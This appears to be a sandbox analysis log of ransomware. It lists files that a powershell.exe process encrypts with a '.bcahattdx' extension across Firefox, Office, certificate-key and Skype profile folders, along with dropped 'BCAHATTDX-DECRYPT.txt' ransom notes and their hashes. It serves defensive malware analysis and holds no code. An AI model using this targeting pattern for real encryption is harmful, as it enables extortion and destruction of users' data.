C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklist.xml.bcahattdx
binary
MD5: 74aa617c47a4149ce38f9e758ce2cebd
SHA256: f1cc8f478b91ad74aff7a79683619c139923745ca8bc14ed711cd0369bcc690c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklist.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addonStartup.json.lz4.bcahattdx
binary
MD5: 5a67729056c9af9d3dc2d1098283ac5d
SHA256: ab1b60cf7f082f2245dbc7ecdd5f899b2f912cae608fada04b0f68e3b7690b45
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addons.json.bcahattdx
binary
MD5: 69820fc4d75d460c8524b46f8bcf7892
SHA256: e3980749551788873a74c37672cf2aaa36427621fe10e98f38175654c756edfa
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addonStartup.json.lz4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addons.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20180807170231.bcahattdx
binary
MD5: b7f6fcff7e64e7219a7543ce4b6c25fe
SHA256: da7e8b1b4331dca2c4543ae37293e2d3f3dfe8c8729c90e2917fbaa97a3e5387
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Pending Pings\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20180807170231
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Extensions\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.bcahattdx
binary
MD5: 2c35256c8adc6528b4d4d69d25b77705
SHA256: aa3b628f492077c2ff4eec7f711eb5e35e0614534b6e898b036e5f776467568a
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Vault\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Word\STARTUP\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm.bcahattdx
binary
MD5: 185c07539501142e775592c5309ca5f0
SHA256: 66b649e387dee3f73edc3f429c05126de1d5acb53942617282b46075ecea6139
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Word\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4.bcahattdx
binary
MD5: 7ccb7d29bbf110f45d6e7123563c18d9
SHA256: 12b5ec7dea9e295efafc0bbbb6e74f81a73f0f9f83370f15554871acd8d58eea
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\1033\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm.bcahattdx
binary
MD5: 8e4730d49f7a5b8b6b56626cadb4e311
SHA256: fbbb5baafc0aeb195c6a6564ea4d1721e71569d1ee6507fb3e04fd38b845f0a4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Stationery\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Speech\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70.bcahattdx
binary
MD5: 9b420c84cdc61d9645a33fb527d3c926
SHA256: 08e424b7ab4b6db788a4c8af016a08b980ff1118d153fc9dab94eb79b1393a29
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog.bcahattdx
binary
MD5: 476e51dd0e261009b2148639d34a2303
SHA256: 01fa7bc992e1d2770de9f25afac6cb614cff771f0d91bbd29229764016973a61
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml.bcahattdx
binary
MD5: 93a1aae1246a5ef0594c338e01565fc2
SHA256: 5f52ae1e49d189a4b52e2136d8c6828f362f102e0f49c444c4844dac784bf277
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal.bcahattdx
binary
MD5: 7276119ce07b89056b9f767b06a21307
SHA256: fb80fa621537ea6308b1eb2b32e815e6e7c9aa9345d48a43cf454db9c41279ba
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db.bcahattdx
binary
MD5: 0059b17383fcc000a487f983dbe27add
SHA256: eb8064544a3bc01bbf00a3a32ab0ab01f725cf0b6c01e7dc608f19ac23bb8fea
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal.bcahattdx
binary
MD5: 9c09bd622e12455a139108fc21c091f7
SHA256: a65615475765c9fbfc52a3518d02399b2ac2108e86c6a8a6ee2a2f3c2d48f26c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml.bcahattdx
binary
MD5: bfbf069e0508fb176bcc574f02ab917a
SHA256: 5a0569c3928744e2b955aedb614a247f6d53e16d4bb43531f89a4979f460b152
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data.bcahattdx
binary
MD5: 1a5377f2f7054d6c717099e8acd9e511
SHA256: fd776f5f8d4b2e12674e6fcc407d4dced9c3e9b115f6dc703b92b0fac3ba91db
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm.bcahattdx
binary
MD5: 095c95d0b57f1b59872d989298d05f45
SHA256: 613787caef827a3f9b430385209d0d1470e317854c83b3d5405a2117f37cd9d3
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json.bcahattdx
binary
MD5: eb6c8bf51cc0966354383607333ad870
SHA256: 2ebf4bb96e45e4d0d535381ddc4ba2b36bf882a1718ae8f26851ecf7d42869ae
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences.bcahattdx
binary
MD5: 01ad2d214f3d1b7797bc8446ef69a30c
SHA256: bccfa8d257d21f10eed1a8d720595c44748e67a30a0b39b5bd190cadea8696fc
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager.bcahattdx
binary
MD5: 57828cdcef93e20fcb3711319f68658c
SHA256: 322445382ee2bb523400e1fe7f6cf9af5cdd5e8ad27ddb842e754bb33fc22f49
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak.bcahattdx
binary
MD5: effd9c153a71cb42063be2f7fca2583e
SHA256: 48b407f1aaf3b03d094bccb6d68cbccee47ffd73c870c5ee0b09ed9f766c9a81
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog.bcahattdx
binary
MD5: 1b95645271ec7d9ec648515c1205f1bc
SHA256: ad8c1924e9b0a16d9bbffb454c0f8b8e2c93b54760b9887e0fe395177a2a546b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog.bcahattdx
binary
MD5: 4bbf339a2abcdd41d644753b2047fbb7
SHA256: e542042bb5fe6b6d542a7285d6740f2f19559f41f1e3a4ce6ee6bfd156ad1693
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bcahattdx
binary
MD5: 697a3dff1f95922055785bc72a9a6535
SHA256: c62b2ad65f6d2133818fd6648bb39ae2a1857132652a08ab5a9220482ea111fd
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\logs\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old.bcahattdx
binary
MD5: 38ceaf19be904c6a3c53b536da023261
SHA256: a6cc0262fb112fbf638c82603ee072d6893ba6003eccea7d4168082e71c9e20c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001.bcahattdx
binary
MD5: e6281a09f7b628adcd463645de23b6ad
SHA256: 950885ffd01e2a8feb4a94233311791febdcfa42dab9ec8dabf652ef13d3b605
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT.bcahattdx
vc
MD5: 8da1508bfa1d81d94b986f9f20ee089f
SHA256: fed8ddc123d5d61ec1a97bc65999f61aaa6d903c2ee5f50850c76ac7a8c7daf6
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.bcahattdx
binary
MD5: 7c230ef1ddd8d84672c0b85fcb539bf9
SHA256: 40bb777989cbcd0d9d6fff8d3dabdd272ff5afd3bfab46d695b05d0ce5b72442
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log.bcahattdx
binary
MD5: 0f82db486bef3cd7b489ed93bec4752b
SHA256: 0f222983c29b01a60f4819477d07c68f7c64c35ce3f45c75f688a7831c85ed49
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb.bcahattdx
binary
MD5: e0c8f5b5ea31660d3859ccba5a01dd92
SHA256: 0e89fcacf0854c63153511b4ece930237872f95678d8efe627affd8f1a638a5c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old.bcahattdx
binary
MD5: 76325db8c65b3d27708c1fb5c46cf344
SHA256: 31afbfe6cfa3f30267b9dfdb0579e8d1a0ab41bb86a2874bb55c0c6a27d3c0d0
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb.bcahattdx
binary
MD5: f2dfd19563a3635a2f50c48d38a9e98d
SHA256: 68ba9e351f769878264533d63182d854640ed6adacade5fa5992ae0056b97d6a
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001.bcahattdx
binary
MD5: fe60576f07ac0d784bd455114526be07
SHA256: 22d175b3876e280fbfbe3d15f04f96286a37fdafdb09454a44043b54a9553128
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT.bcahattdx
binary
MD5: 919838ea15991acd99bb32289bd298d5
SHA256: 9b69f477a30cb2c5bcb7b1f641f5bdb37689d5fef361d304389bc1e16ddbc3d3
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.bcahattdx
binary
MD5: 83afdf6f57bb77964376c7113719a4f8
SHA256: 8c34e24495d3214549198fddd1f187a21e6cb0149dcb58f452011c9a014ee325
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log.bcahattdx
binary
MD5: ffb7663fb919f601913fd3cadb8f02fa
SHA256: cf516e6736a72c2402822d826cc1db13afc8e738d937c8485d3cc6aa19bd7ff2
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic.bcahattdx
binary
MD5: 8227a1e6f85d8dbf97218c119e121006
SHA256: 63ef5607d017c615f9bf4e373d9e5738872bb39025e4c8a8914f76a4112ae136
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json.bcahattdx
binary
MD5: cdd38b7dff3882b962179ac0f9d9abd4
SHA256: 7fd5853f563eb892508f0b3c2d8e86f7df40250c929122657fbabd6df11152e2
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json.bcahattdx
binary
MD5: f8401b2fd4fe3416bd5643ea03d45f39
SHA256: 3601731aa31330060864d64cf6c9d729b67cb6f2d4a303b8108571fe36dc50d8
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies.bcahattdx
binary
MD5: e963596c23996738804f99717bc16c4d
SHA256: b284d610954dc24bc812f8c7c28468a4096128c42d6ebbf66d1b2e234c0060c7
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db.bcahattdx
binary
MD5: bef9568cf9ac9803dd2c1b3aba37673d
SHA256: aef5ace65ba4f791242caeaf11965b444590fa931ff51826470ca04d4c6091e4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004.bcahattdx
binary
MD5: c2238ecccbdb6a42d9a592d7b5e61058
SHA256: dccd8c3d18b31ada2446f72fda452a7bc7f68f13b1a645c879cad2ddfaf60511
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index.bcahattdx
binary
MD5: f9b24b2f287eb4cb0eb77489a2dbc2c3
SHA256: 5c0ef25907989fae3368e1ee5e18c6a33a812135e6aaa5b9d2eeb49cec453314
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001.bcahattdx
binary
MD5: 8bcba24057c717080bdcf1ef75c35208
SHA256: 2f52a03e0d2a6ab792998cf1d6e61ca5d4352d5ce0f583094d6fc109ca8d8162
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003.bcahattdx
binary
MD5: cd1be233360eae28cdf378149af24045
SHA256: 9d22e058bd59e84a78de6e029b4341d946e698f9cec7a3060a1542b4d25d17f4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002.bcahattdx
binary
MD5: 730206e7a09f08b38e3b220e4267f52b
SHA256: 7b0a81ae4f3825ceb4aee7064cd30ce2bc0dc7b6c4a894158e8a13138cc11844
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001
––
MD5:  ––
